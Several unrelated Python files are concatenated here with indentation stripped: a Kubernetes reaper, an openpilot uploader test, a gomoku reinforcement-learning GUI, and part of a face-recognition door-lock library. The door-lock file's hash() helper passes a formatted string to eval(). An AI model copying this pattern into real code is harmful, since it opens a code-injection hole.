def get_managed_objects(ctx) -> [typing.Union[client.V1Deployment, client.V1DaemonSet]]:
apps = client.AppsV1Api()
selector = label_selector({
ctx.obj['managed_label']: True
})
deployments = apps.list_deployment_for_all_namespaces(label_selector=selector, watch=False)
daemonsets = apps.list_daemon_set_for_all_namespaces(label_selector=selector, watch=False)
return deployments.items + daemonsets.items
def objects_max_age(ctx, obj: typing.Union[client.V1Deployment, client.V1DaemonSet]):
if ctx.obj['max_age_label'] in obj.metadata.labels:
return parse_duration(obj.metadata.labels[ctx.obj['max_age_label']])
return parse_duration(ctx.obj['default_max_age'])
def object_aged(ctx, obj: typing.Union[client.V1Deployment, client.V1DaemonSet]) -> bool:
max_age = objects_max_age(ctx, obj)
core = client.CoreV1Api()
pods = core.list_namespaced_pod(namespace=obj.metadata.namespace, label_selector=label_selector(obj.spec.selector.match_labels))
for pod in pods.items:
if pod.status.phase == 'Running':
if get_pod_runtime(pod) > max_age:
return True
return False
def get_pod_runtime(pod: client.V1Pod):
return datetime.utcnow() - pod.metadata.creation_timestamp.replace(tzinfo=None)
def restart_managed_object(ctx, obj: typing.Union[client.V1Deployment, client.V1DaemonSet]):
restarted_on = time_to_str(datetime.utcnow())
obj.spec.template.metadata.annotations[ctx.obj['restart_label']] = restarted_on
apps = client.AppsV1Api()
if isinstance(obj, (client.V1Deployment,)):
apps.patch_namespaced_deployment(
name=obj.metadata.name,
namespace=obj.metadata.namespace,
body=obj,
)
elif isinstance(obj, (client.V1DaemonSet,)):
apps.patch_namespaced_daemon_set(
name=obj.metadata.name,
namespace=obj.metadata.namespace,
body=obj,
)
if __name__ == '__main__':
reaper()
|
test_uploader.py
|
#!/usr/bin/env python3
import os
import time
import threading
import unittest
import logging
import json
from selfdrive.swaglog import cloudlog
import selfdrive.loggerd.uploader as uploader
from common.xattr import getxattr
from selfdrive.loggerd.tests.loggerd_tests_common import UploaderTestCase
class TestLogHandler(logging.Handler):
def __init__(self):
logging.Handler.__init__(self)
self.reset()
def reset(self):
self.upload_order = list()
self.upload_ignored = list()
def emit(self, record):
try:
j = json.loads(record.getMessage())
if j["event"] == "upload_success":
self.upload_order.append(j["key"])
if j["event"] == "upload_ignored":
self.upload_ignored.append(j["key"])
except Exception:
pass
log_handler = TestLogHandler()
cloudlog.addHandler(log_handler)
class TestUploader(UploaderTestCase):
def setUp(self):
super().setUp()
log_handler.reset()
def start_thread(self):
self.end_event = threading.Event()
self.up_thread = threading.Thread(target=uploader.uploader_fn, args=[self.end_event])
self.up_thread.daemon = True
self.up_thread.start()
def join_thread(self):
self.end_event.set()
self.up_thread.join()
def gen_files(self, lock=False, boot=True):
f_paths = list()
for t in ["qlog.bz2", "rlog.bz2", "dcamera.hevc", "fcamera.hevc"]:
f_paths.append(self.make_file_with_data(self.seg_dir, t, 1, lock=lock))
if boot:
f_paths.append(self.make_file_with_data("boot", f"{self.seg_dir}.bz2", 1, lock=lock))
return f_paths
def gen_order(self, seg1, seg2, boot=True):
keys = []
if boot:
keys += [f"boot/{self.seg_format.format(i)}.bz2" for i in seg1]
keys += [f"boot/{self.seg_format2.format(i)}.bz2" for i in seg2]
keys += [f"{self.seg_format.format(i)}/qlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/qlog.bz2" for i in seg2]
keys += [f"{self.seg_format.format(i)}/rlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/rlog.bz2" for i in seg2]
for i in seg1:
keys += [f"{self.seg_format.format(i)}/{f}" for f in ['fcamera.hevc', 'dcamera.hevc']]
for i in seg2:
keys += [f"{self.seg_format2.format(i)}/{f}" for f in ['fcamera.hevc', 'dcamera.hevc']]
return keys
def test_upload(self):
self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(exp_order), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(exp_order), "Some files were uploaded twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_upload_ignored(self):
self.set_ignore()
self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(len(log_handler.upload_order) == 0, "Some files were not ignored")
self.assertFalse(len(log_handler.upload_ignored) < len(exp_order), "Some files failed to ignore")
self.assertFalse(len(log_handler.upload_ignored) > len(exp_order), "Some files were ignored twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not ignored")
self.assertTrue(log_handler.upload_ignored == exp_order, "Files ignored in wrong order")
def test_upload_files_in_create_order(self):
seg1_nums = [0, 1, 2, 10, 20]
for i in seg1_nums:
self.seg_dir = self.seg_format.format(i)
self.gen_files(boot=False)
seg2_nums = [5, 50, 51]
for i in seg2_nums:
self.seg_dir = self.seg_format2.format(i)
self.gen_files(boot=False)
exp_order = self.gen_order(seg1_nums, seg2_nums, boot=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(exp_order), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(exp_order), "Some files were uploaded twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_no_upload_with_lock_file(self):
self.start_thread()
time.sleep(0.25)
f_paths = self.gen_files(lock=True, boot=False)
# allow enough time that files should have been uploaded if they would be uploaded
time.sleep(5)
self.join_thread()
for f_path in f_paths:
self.assertFalse(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "File upload when locked")
def test_clear_locks_on_startup(self):
f_paths = self.gen_files(lock=True, boot=False)
self.start_thread()
time.sleep(1)
self.join_thread()
for f_path in f_paths:
self.assertFalse(os.path.isfile(f_path + ".lock"), "File lock not cleared on startup")
if __name__ == "__main__":
unittest.main(failfast=True)
|
main.py
|
# import matplotlib
# print(matplotlib.get_backend())
# print(matplotlib.is_interactive())
# matplotlib.use('Qt4Agg')
import os
import glob
import copy
import datetime
import random
from threading import Thread
import matplotlib.patches as patches
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from six.moves import queue
from tentacle.config import cfg
from tentacle.board import Board
from tentacle.game import Game
from tentacle.server import net
from tentacle.strategy import StrategyHuman
from tentacle.strategy import StrategyMC
# from tentacle.strategy import StrategyNetBot
# from tentacle.strategy import StrategyMCTS1
from tentacle.strategy import StrategyMinMax
from tentacle.strategy import StrategyTD, StrategyRand
from tentacle.strategy_dnn import StrategyDNN
WORK_DIR = cfg.WORK_DIR
SL_BRAIN_DIR = cfg.BRAIN_DIR
RL_BRAIN_DIR = cfg.RL_BRAIN_DIR
STAT_FILE = cfg.STAT_FILE
FILE_PREFIX = cfg.FILE_PREFIX
class Gui(object):
STATE_IDLE = 0
STATE_TRAINING = 1
STATE_PLAY = 2
RESULT_MSG = {Board.STONE_BLACK: 'Black Win',
Board.STONE_WHITE: 'White Win',
Board.STONE_EMPTY: 'Draw'}
def __init__(self):
size = Board.BOARD_SIZE
keymap = [k for k in plt.rcParams.keys() if k.startswith('keymap.')]
for k in keymap:
plt.rcParams[k] = ''
self.fig = plt.figure(figsize=((size + 1) / 2.54, (size + 1) / 2.54), facecolor='#FFE991')
self.fig.canvas.set_window_title('Training')
span = 1. / (size + 1)
self.ax = self.fig.add_axes((span, span, (size - 1) * span, (size - 1) * span),
aspect='equal',
axis_bgcolor='none',
xticks=range(size),
yticks=range(size),
xticklabels=[chr(ord('A') + i) for i in range(size)],
yticklabels=range(1, 1 + size))
self.ax.grid(color='k', linestyle='-', linewidth=1)
self.ax.set_title('press T for training')
self.black_stone = patches.Circle((0, 0), .45,
facecolor='#131814', edgecolor=(.8, .8, .8, 1),
linewidth=2, clip_on=False, zorder=10)
self.white_stone = copy.copy(self.black_stone)
self.white_stone.set_facecolor('#FCF5F4')
self.white_stone.set_edgecolor((.5, .5, .5))
self.fig.canvas.mpl_connect('key_press_event', self._key_press)
self.fig.canvas.mpl_connect('close_event', self._handle_close)
# self.fig.canvas.mpl_connect('button_press_event', self._button_press)
self.state = Gui.STATE_IDLE
self.strategy_1 = None
self.strategy_2 = None
self.game = None
self.all_stones = []
self.oppo_pool = []
self.msg_queue = queue.Queue(maxsize=100)
self.timer = self.fig.canvas.new_timer(interval=50)
self.timer.add_callback(self.on_update)
self.timer.start()
plt.show()
def _handle_close(self, event):
if self.strategy_1 is not None:
self.strategy_1.close()
if self.strategy_2 is not None:
self.strategy_2.close()
def _key_press(self, event):
# print('press', event.key)
if event.key == '0':
# clear
pass
elif event.key == 'e':
# edit mode
pass
elif event.key == '1':
self.strategy_1 = StrategyTD(1, 1)
self.strategy_1.load('./brain1.npz')
self.strategy_1.stand_for = Board.STONE_BLACK
elif event.key == '2':
self.strategy_2 = StrategyTD(1, 1)
self.strategy_2.load('./brain2.npz')
self.strategy_2.stand_for = Board.STONE_WHITE
elif event.key == '3':
self.strategy_1.save('./brain1.npz')
self.strategy_2.save('./brain2.npz')
elif event.key == '4':
self.strategy_1 = StrategyMC()
self.strategy_1.load('./brain1.npz')
self.strategy_1.stand_for = Board.STONE_BLACK
elif event.key == '5':
self.strategy_2 = StrategyMC()
self.strategy_2.load('./brain2.npz')
self.strategy_2.stand_for = Board.STONE_WHITE
elif event.key == 't':
self.state = Gui.STATE_TRAINING
Game.on_training = True
s1, s2 = self.init_both_sides()
self.train1(s1, s2) # god view
elif event.key == 'r':
self.learn_from_2_teachers()
elif event.key == 'f2':
self.state = Gui.STATE_PLAY
Game.on_training = False
self.vs_human(Board.STONE_BLACK)
elif event.key == 'f3':
self.state = Gui.STATE_PLAY
Game.on_training = False
self.vs_human(Board.STONE_WHITE)
elif event.key == 'f1':
pass
elif event.key == 'm':
self.match()
elif event.key == 'f4':
self.reinforce()
elif event.key == 'f5':
self.join_net_match()
elif event.key == 'f12':
plt.pause(600)
def _button_press(self, event):
if self.state != Gui.STATE_PLAY:
return
if not self.game.wait_human:
return
if (event.xdata is None) or (event.ydata is None):
return
i, j = map(round, (event.xdata, event.ydata))
# print('click at(%d, %d)' % (i, j))
def which_one(self, which_side):
if self.strategy_1 is not None and self.strategy_1.stand_for == which_side:
return self.strategy_1
elif self.strategy_2 is not None and self.strategy_2.stand_for == which_side:
return self.strategy_2
return None
def vs_human(self, which_side_human_play):
strategy = self.which_one(Board.oppo(which_side_human_play))
if strategy is None or isinstance(strategy, StrategyRand):
strategy = self.which_one(which_side_human_play)
if strategy is None:
print('without opponent')
return
old_is_learning, old_stand_for = strategy.is_learning, strategy.stand_for
strategy.is_learning, strategy.stand_for = False, Board.oppo(which_side_human_play)
s1 = strategy
s2 = StrategyHuman()
s2.stand_for = which_side_human_play
self.game = Game(Board(), s1, s2, self.msg_queue)
self.game.step_to_end()
strategy.is_learning, strategy.stand_for = old_is_learning, old_stand_for
def clear_board(self):
print('\nclear board\n')
for s in self.all_stones:
s.remove()
self.all_stones.clear()
def show(self, who, loc):
i, j = divmod(loc, Board.BOARD_SIZE)
s = None
if who == Board.STONE_BLACK:
s = copy.copy(self.black_stone)
elif who == Board.STONE_WHITE:
s = copy.copy(self.white_stone)
s.center = (i, j)
self.all_stones.append(s)
self.ax.add_patch(s)
def measure_perf(self, s1, s2):
old_epsilon1, old_is_learning1, old_stand_for1 = s1.epsilon, s1.is_learning, s1.stand_for
# old_epsilon2, old_is_learning2, old_stand_for2 = s2.epsilon, s2.is_learning, s2.stand_for
old_is_learning2, old_stand_for2 = s2.is_learning, s2.stand_for
s1.epsilon, s1.is_learning, s1.stand_for = 0, False, Board.STONE_BLACK
# s2.epsilon, s2.is_learning, s2.stand_for = 0, False, Board.STONE_WHITE
s2.is_learning, s2.stand_for = False, Board.STONE_WHITE
s3 = StrategyRand()
probs = [0, 0, 0, 0, 0, 0]
games = 3 # 30
for i in range(games):
# the learner s1 move first(use black)
s1.stand_for = Board.STONE_BLACK
s2.stand_for = Board.STONE_WHITE
g = Game(Board(), s1, s2)
g.step_to_end()
if g.winner == Board.STONE_BLACK:
probs[0] += 1
elif g.winner == Board.STONE_EMPTY:
probs[1] += 1
# the learner s1 move second(use white)
s1.stand_for = Board.STONE_WHITE
s2.stand_for = Board.STONE_BLACK
g = Game(Board(), s1, s2)
g.step_to_end()
if g.winner == Board.STONE_WHITE:
probs[2] += 1
elif g.winner == Board.STONE_EMPTY:
probs[3] += 1
# the learner s1 move first vs. random opponent
s1.stand_for = Board.STONE_BLACK
s3.stand_for = Board.STONE_WHITE
g = Game(Board(), s1, s3)
g.step_to_end()
if g.winner == Board.STONE_BLACK:
probs[4] += 1
# the learner s1 move second vs. random opponent
s1.stand_for = Board.STONE_WHITE
s3.stand_for = Board.STONE_BLACK
g = Game(Board(), s1, s3)
g.step_to_end()
if g.winner == Board.STONE_WHITE:
probs[5] += 1
probs = [i / games for i in probs]
print(probs)
s1.epsilon, s1.is_learning, s1.stand_for = old_epsilon1, old_is_learning1, old_stand_for1
# s2.epsilon, s2.is_learning, s2.stand_for = old_epsilon2, old_is_learning2, old_stand_for2
s2.is_learning, s2.stand_for = old_is_learning2, old_stand_for2
return probs
def draw_perf(self, perf):
series = ['black win', 'black draw', 'white win', 'white draw', 'PvR 1st', 'PvR 2nd']
colors = ['r', 'b', 'g', 'c', 'm', 'y']
plt.figure()
axes = plt.gca()
axes.set_ylim([-0.1, 1.1])
for i in range(1, len(perf)):
plt.plot(perf[0], perf[i], label=series[i - 1], color=colors[i - 1])
plt.legend(loc='upper left', bbox_to_anchor=(1, 1))
plt.show()
# plt.savefig('selfplay_random_{0}loss.png'.format(p1.lossval))
plt.figure(self.fig.number)
def init_both_sides(self):
# feat = Board.BOARD_SIZE_SQ * 2 + 2
# if self.strategy_1 is None:
# s1 = StrategyTD(feat, feat * 2)
# s1.stand_for = Board.STONE_BLACK
# s1.alpha = 0.3
# s1.beta = 0.3
# s1.lambdaa = 0.05
# s1.epsilon = 0.3
# self.strategy_1 = s1
# else:
# s1 = self.strategy_1
# s1.epsilon = 0.3
if self.strategy_1 is None:
# s1 = StrategyMC()
# s1 = StrategyANN(feat, feat * 2)
file = tf.train.latest_checkpoint(RL_BRAIN_DIR)
s1 = StrategyDNN(from_file=file, part_vars=True)
# s1 = StrategyMCTS1()
self.strategy_1 = s1
else:
s1 = self.strategy_1
s1.is_learning = True
s1.stand_for = Board.STONE_BLACK
# if self.strategy_2 is None:
# s2 = StrategyTD(feat, feat * 2)
# s2.stand_for = Board.STONE_WHITE
# self.strategy_2 = s2
# else:
# s2 = self.strategy_2
# s2.is_learning = False
s2 = StrategyRand()
# s2 = StrategyMinMax()
s2.stand_for = Board.STONE_WHITE
self.strategy_2 = s2
return s1, s2
def match(self):
s1, s2 = self.strategy_1, self.strategy_2
print('player1:', s1.__class__.__name__)
print('player2:', s2.__class__.__name__)
probs = np.zeros(6)
games = 100 # 30
for i in range(games):
print(i)
s1.stand_for = Board.STONE_BLACK
s2.stand_for = Board.STONE_WHITE
g = Game(Board.rand_generate_a_position(), s1, s2)
g.step_to_end()
if g.winner == Board.STONE_BLACK:
probs[0] += 1
elif g.winner == Board.STONE_WHITE:
probs[1] += 1
else:
probs[2] += 1
s1.stand_for = Board.STONE_WHITE
s2.stand_for = Board.STONE_BLACK
g = Game(Board.rand_generate_a_position(), s1, s2)
g.step_to_end()
if g.winner == Board.STONE_WHITE:
probs[3] += 1
elif g.winner == Board.STONE_BLACK:
probs[4] += 1
else:
probs[5] += 1
print('total play:', games)
print(probs)
def train1(self, s1, s2):
'''train one time
Returns:
------------
winner : Strategy
the win strategy
'''
max_explore_rate = 0.95
win1, win2, draw = 0, 0, 0
step_counter, explo_counter = 0, 0
begin = datetime.datetime.now()
episodes = 1
# samples = 100
# interval = episodes // samples
# perf = [[] for _ in range(7)]
learner = s1 if s1.is_learning else s2
# oppo = self.which_one(Board.oppo(learner.stand_for))
stat_win = []
# past_me = learner.mind_clone()
for i in range(episodes):
# if (i + 1) % interval == 0:
# print(np.allclose(s1.hidden_weights, past_me.hidden_weights))
# probs = self.measure_perf(learner, oppo)
# perf[0].append(i)
# for idx, x in enumerate(probs):
# perf[idx + 1].append(x)
learner.epsilon = max_explore_rate * np.exp(-5 * i / episodes) # * (1 if i < episodes//2 else 0.3) #
g = Game(Board(), s1, s2)
g.step_to_end()
win1 += 1 if g.winner == Board.STONE_BLACK else 0
win2 += 1 if g.winner == Board.STONE_WHITE else 0
draw += 1 if g.winner == Board.STONE_EMPTY else 0
stat_win.append(win1 - win2 - draw)
# rec.append(win1)
step_counter += g.step_counter
explo_counter += g.exploration_counter
# print('steps[%d], explos[%d]' % (g.step_counter, g.exploration_counter))
print('training...%d' % i)
total = win1 + win2 + draw
print("black win: %f" % (win1 / total))
print("white win: %f" % (win2 / total))
print("draw: %f" % (draw / total))
print('avg. steps[%f], avg. explos[%f]' % (step_counter / episodes, explo_counter / episodes))
end = datetime.datetime.now()
diff = end - begin
print("time cost[%f]s, avg.[%f]s" % (diff.total_seconds(), diff.total_seconds() / episodes))
# with open('stat-result-win.txt', 'w') as f:
# f.write(repr(stat_win))
# print(perf)
# self.draw_perf(perf)
# np.set_printoptions(threshold=np.nan, formatter={'float_kind' : lambda x: "%.4f" % x})
# with open('stat-result-net-train-errors.txt', 'w') as f:
# f.write(repr(np.array(s1.errors)))
winner = Board.STONE_BLACK if win1 >= win2 else Board.STONE_WHITE
return self.which_one(winner), max(win1, win2) / total
# plt.title('press F3 start')
# print(len(rec))
# plt.plot(rec)
def learn_from_2_teachers(self):
s1 = StrategyMinMax()
s1.stand_for = Board.STONE_BLACK
self.strategy_1 = s1
s2 = StrategyMinMax()
s2.stand_for = Board.STONE_WHITE
self.strategy_2 = s2
observer = StrategyMC()
win1, win2, draw = 0, 0, 0
step_counter, explo_counter = 0, 0
begin = datetime.datetime.now()
episodes = 10000
for i in range(episodes):
g = Game(Board(), s1, s2, observer=observer)
g.step_to_end()
win1 += 1 if g.winner == Board.STONE_BLACK else 0
win2 += 1 if g.winner == Board.STONE_WHITE else 0
draw += 1 if g.winner == Board.STONE_EMPTY else 0
step_counter += g.step_counter
explo_counter += g.exploration_counter
print('training...%d' % i)
total = win1 + win2 + draw
print("black win: %f" % (win1 / total))
print("white win: %f" % (win2 / total))
print("draw: %f" % (draw / total))
print('avg. steps[%f], avg. explos[%f]' % (step_counter / episodes, explo_counter / episodes))
end = datetime.datetime.now()
diff = end - begin
print("time cost[%f]s, avg.[%f]s" % (diff.total_seconds(), diff.total_seconds() / episodes))
observer.save('./brain1.npz')
def from_new_start_point(self, winner, s1, s2):
'''
Returns:
------------
s1 : Strategy
the learner
s2 : Strategy
the teacher
'''
if s1 == winner:
s2 = s1.mind_clone()
if s2 == winner:
s1 = s2.mind_clone()
# way 1: s1 follow the winner's stand-for
s1.stand_for = winner.stand_for
# way 2: s1 switch to another stand-for of winner
# s1.stand_for = Board.oppo(winner.stand_for)
# way 3: s1 random select stand-for
# s1.stand_for = np.random.choice(np.array([Board.STONE_BLACK, Board.STONE_WHITE]))
s2.stand_for = Board.oppo(s1.stand_for)
s1.is_learning = True
s2.is_learning = False
return s1, s2
def train2(self):
'''train many times
'''
s1, s2 = self.init_both_sides()
win_probs = []
begin = datetime.datetime.now()
counter = 0
while True:
print('epoch...%d' % counter)
winner, win_prob = self.train1(s1, s2)
win_probs.append(win_prob)
counter += 1
if counter >= 10:
break
s1, s2 = self.from_new_start_point(winner, s1, s2)
end = datetime.datetime.now()
diff = end - begin
print("total time cost[%f] hour" % (diff.total_seconds() / 3600))
print('win probs: ', win_probs)
plt.title('press F3 start')
def reinforce(self, resume=True):
self.oppo_pool = self.get_mindsets(RL_BRAIN_DIR, FILE_PREFIX)
part_vars = True
if resume and len(self.oppo_pool) != 0:
file = tf.train.latest_checkpoint(RL_BRAIN_DIR)
part_vars = False
else:
file = tf.train.latest_checkpoint(SL_BRAIN_DIR)
part_vars = True
s1 = StrategyDNN(is_train=False, is_revive=True, is_rl=True, from_file=file, part_vars=part_vars)
print('I was born from', file)
if len(self.oppo_pool) != 0:
file = random.choice(self.oppo_pool)
file = os.path.join(RL_BRAIN_DIR, file)
part_vars = False
else:
file = tf.train.latest_checkpoint(SL_BRAIN_DIR)
part_vars = True
s2 = StrategyDNN(is_train=False, is_revive=True, is_rl=False, from_file=file, part_vars=part_vars)
print('vs.', file)
stat = []
# n_lose = 0
iter_n = 100
for i in range(iter_n):
print('iter:', i)
win1, win2, draw = 0, 0, 0
step_counter, explo_counter = 0, 0
episodes = cfg.REINFORCE_PERIOD
for _ in range(episodes):
s1.stand_for = random.choice([Board.STONE_BLACK, Board.STONE_WHITE])
s2.stand_for = Board.oppo(s1.stand_for)
g = Game(Board.rand_generate_a_position(), s1, s2, observer=s1)
g.step_to_end()
win1 += 1 if g.winner == s1.stand_for else 0
win2 += 1 if g.winner == s2.stand_for else 0
draw += 1 if g.winner == Board.STONE_EMPTY else 0
# print('winner: {:d}, stand for: {:d}'.format(g.winner, s1.stand_for))
s1.win_ratio = win1 / win2 if win2 != 0 else 1.
step_counter += g.step_counter
explo_counter += g.exploration_counter
if s1.win_ratio > 1.1:
file = FILE_PREFIX + '-' + str(i)
s1.mind_clone(os.path.join(RL_BRAIN_DIR, FILE_PREFIX), i)
self.oppo_pool.append(file)
file = random.choice(self.oppo_pool)
file = os.path.join(RL_BRAIN_DIR, file)
s2.close()
s2 = StrategyDNN(is_train=False, is_revive=True, is_rl=False, from_file=file, part_vars=False)
print('vs.', file)
# n_lose = 0
# elif win1 < win2:
# n_lose += 1
# if n_lose >= 50:
# break
if i % 1 == 0 or i + 1 == iter_n:
total = win1 + win2 + draw
win1_r = win1 / total
win2_r = win2 / total
draw_r = draw / total
print("iter:%d, win: %.3f, lose: %.3f, draw: %.3f, t: %.3f" % (i, win1_r, win2_r, draw_r, s1.temperature))
stat.append([win1_r, win2_r, draw_r])
print('avg. steps[%f], avg. explos[%f]' % (step_counter / episodes, explo_counter / episodes))
if i % 10 == 0 or i + 1 == iter_n:
np.savez(STAT_FILE, stat=np.array(stat))
print('rl done. you can try it.')
self.strategy_1 = self.strategy_2 = s1
def get_mindsets(self, folder, prefix):
mindsets = set()
pattern = os.path.join(folder, prefix) + '*'
listing = glob.glob(pattern)
for f in listing:
mindsets.add(os.path.splitext(os.path.basename(f))[0])
return list(mindsets)
def on_update(self):
i = 0
redraw = False
while True:
msg = None
try:
msg = self.msg_queue.get_nowait()
except queue.Empty:
break
if msg is None:
break
# print(msg[0], ' ', msg[1] if len(msg) > 1 else '')
if msg[0] == 'start':
self.clear_board()
redraw = True
elif msg[0] == 'move':
self.show(msg[1], msg[2])
redraw = True
elif msg[0] == 'end':
self.ax.set_title(Gui.RESULT_MSG[msg[1]])
redraw = True
self.msg_queue.task_done()
i += 1
if i >= 5: # max msg num each time deal with
break
if redraw:
self.fig.canvas.draw()
def join_net_match(self):
net_t = Thread(target=net, args=(self.msg_queue,), daemon=True)
net_t.start()
if __name__ == '__main__':
gui = Gui()
|
libfidl.py
|
__author__ = "David Taschjian"
import click
import hashlib
import os
import json
import time
import RPi.GPIO as GPIO
from edgetpu.basic.basic_engine import BasicEngine
from edgetpu.classification.engine import ClassificationEngine
from edgetpu.learn.imprinting.engine import ImprintingEngine
from edgetpu.detection.engine import DetectionEngine
import cv2
import numpy as np
from PIL import Image
import threading
PROPERTY_FILE_PATH = './properties.json'
def hash(string, hashtype):
"""
This function returns a defined hash for a string
:param string: a string to hash
:type filename: string
:param hashtype: The hashing function which should be used. It has to be defined in hashlib
:type hashtype: String
:return type: String representation of a hex number
"""
# hash binary representation of string and convert it to hex
return eval('hashlib.{}(string.encode())'.format(hashtype)).hexdigest()
def load_properties():
"""
This function is loading the data from the property file and checking if anything is missing.
:return type: dictonary
"""
with open(PROPERTY_FILE_PATH) as f:
properties = json.load(f)
required_entries = set({'user','classification','detection'})
missing_entries = required_entries - properties.keys()
if not len(missing_entries) == 0:
raise Exception('Propeties corrupted! {} missing.'.format(str(missing_entries)))
return properties
def save_properties(data):
"""
Saves data to property file
"""
with open(PROPERTY_FILE_PATH, 'w') as f:
json.dump(data, f, sort_keys=True, indent=4)
def user_exist(username):
"""
Checks if a user with the given username exists.
:param username: the name of a user
:type username: string
:return type: boolean
"""
#loading all user
user = load_properties()['user']
return username in user.keys()
class Username(click.ParamType):
"""
Custom Type class for click for usernames, to check for new usernames or for current usernames.
:param new: True if class shoud check whether a new username is already taken
:type new: boolean
"""
def __init__(self, new=True):
self.new = new
def convert(self, value, param, ctx):
"""
This is a function used by click.
:param value: the username in interest
:type value : string
:return type: string
"""
if not type(value) == str:
self.fail('expected string for username, got'f"{value!r} of type {type(value.__name__)}",param,ctx)
if self.new:
if user_exist(value):
self.fail(f"{value!r} is already taken!", param, ctx)
else:
return value
else:
if user_exist(value):
return value
else:
self.fail(f"{value!r} does not exist!", param, ctx)
return value
def process_user_pictures(props,source,destination):
click.echo('Fetching files...')
image_list = [f for f in os.listdir(source)
if os.path.isfile(os.path.join(source, f))]
detection = DetectionEngine(props['detection'])
click.echo('Looking for faces..')
found_faces = 0
for filename in image_list:
cv2_im = cv2.imread(os.path.join(source,filename))
pil_im = Image.fromarray(cv2_im)
#searching for faces in the picture
faces = detection.detect_with_image(pil_im,threshold = 0.1, top_k =3,keep_aspect_ratio=True,relative_coord=True)
click.echo('Found {} faces in {}'.format(len(faces),filename))
#check each face and append results to frame
height, width, _= cv2_im.shape
cnt = 0
for face in faces:
x0, y0, x1, y1 = face.bounding_box.flatten().tolist()
x0, y0, x1, y1 = int(x0*width), int(y0*height), int(x1*width), int(y1*height)
#crop out face from camera picture
face_im = cv2_im[y0:y1,x0:x1]
#save image
new_filename = filename[:filename.rfind('.')] + '_' + str(cnt) + '_' +filename[filename.rfind('.'):]
click.echo('Saving {}'.format(new_filename))
cv2.imwrite(os.path.join(destination,new_filename), face_im)
cnt += 1
found_faces += cnt
click.echo(click.style("Done! From {} images we could find {} faces ".format(len(image_list), found_faces), fg='green'))
def retrain_model(props):
"""
This function is using the Imprinting technique to retrain the model by only changing the last layer.
All classes will be abandoned while training multiple users
"""
MODEL_PATH = props['classification']['default_path']
click.echo('Parsing data for retraining...')
train_set = {}
test_set = {}
for user in props['user'].keys():
image_dir = props['user'][user]['images']
images = [f for f in os.listdir(image_dir)
if os.path.isfile(os.path.join(image_dir, f))]
if images:
# allocate the number of images for training an validation
net_pictures =len(images)
click.echo(click.style('We found {} pictures for {}'.format(net_pictures,user),fg='green'))
while True:
k = int(click.prompt('How many pictures do you want for validating the training?'))
if k > 0.25*net_pictures:
click.echo(click.style('At most 25% ({} pictures) of the training data can be used for testing the model!'.format(int(0.25*net_pictures)), fg='yellow'))
elif k <2:
click.echo(click.style('At least 3 pictues must be used for testing the model!', fg='yellow'))
else:
break
test_set[user] = images[:k]
assert test_set, 'No images to test [{}]'.format(user)
train_set[user] = images[k:]
assert train_set, 'No images to train [{}]'.format(user)
#get shape of model to retrain
tmp = BasicEngine(MODEL_PATH)
input_tensor = tmp.get_input_tensor_shape()
shape = (input_tensor[2], input_tensor[1])
#rezising pictures and creating new labels map
train_input = []
labels_map = {}
for user_id, (user, image_list) in enumerate(train_set.items()):
ret = []
for filename in image_list:
with Image.open(os.path.join(props['user'][user]['images'],filename)) as img:
img = img.convert('RGB')
img = img.resize(shape, Image.NEAREST)
ret.append(np.asarray(img).flatten())
train_input.append(np.array(ret))
labels_map[user_id] = user
#Train model
click.echo('Start training')
engine = ImprintingEngine(MODEL_PATH, keep_classes=False)
engine.train_all(train_input)
click.echo(click.style('Training finished!', fg='green'))
#gethering old model files
old_model = props['classification']['path']
old_labels = props['classification']['labels']
#saving new model
props['classification']['path'] = './Models/model{}.tflite'.format(''.join(['_' + u for u in labels_map.values()]))
engine.save_model(props['classification']['path'])
#saving labels
props['classification']['labels'] = props['classification']['path'].replace('classification','labels').replace('tflite','json')
with open(props['classification']['labels'] , 'w') as f:
json.dump(labels_map, f, indent=4)
#Evaluating how well the retrained model performed
click.echo('Start evaluation')
engine = ClassificationEngine(props['classification']['path'])
top_k = 5
correct = [0] * top_k
wrong = [0] * top_k
for user, image_list in test_set.items():
for img_name in image_list:
img = Image.open(os.path.join(props['user'][user]['images'],img_name))
candidates = engine.classify_with_image(img, threshold=0.1, top_k=top_k)
recognized = False
for i in range(top_k):
if i < len(candidates) and user == labels_map[candidates[i][0]]:
recognized = True
if recognized:
correct[i] = correct[i] + 1
else:
wrong[i] = wrong[i] + 1
click.echo('Evaluation Results:')
for i in range(top_k):
click.echo('Top {} : {:.0%}'.format(i+1, correct[i] / (correct[i] + wrong[i])))
# TODO highlight with colors how well it perforemed
if not old_model == props['classification']['path'] and not old_labels == props['classification']['labels'] and (os.path.exists(old_labels) or os.path.exists(old_model)):
if not click.confirm('Do you want to keep old models?'):
os.remove(old_model)
os.remove(old_labels)
click.echo(click.style('Old models removed.', fg='green'))
#saving properties
save_properties(props)
def facial_recogntion(props, smartLock):
"""
Processing camera pictures with multiple AI's and executing background jobs.
This is the main loop for the Door Lock.
AI stages: Movement detection -> Face detection -> Face classification
:param props: Necessery predefined properties
:type props: Dictonary
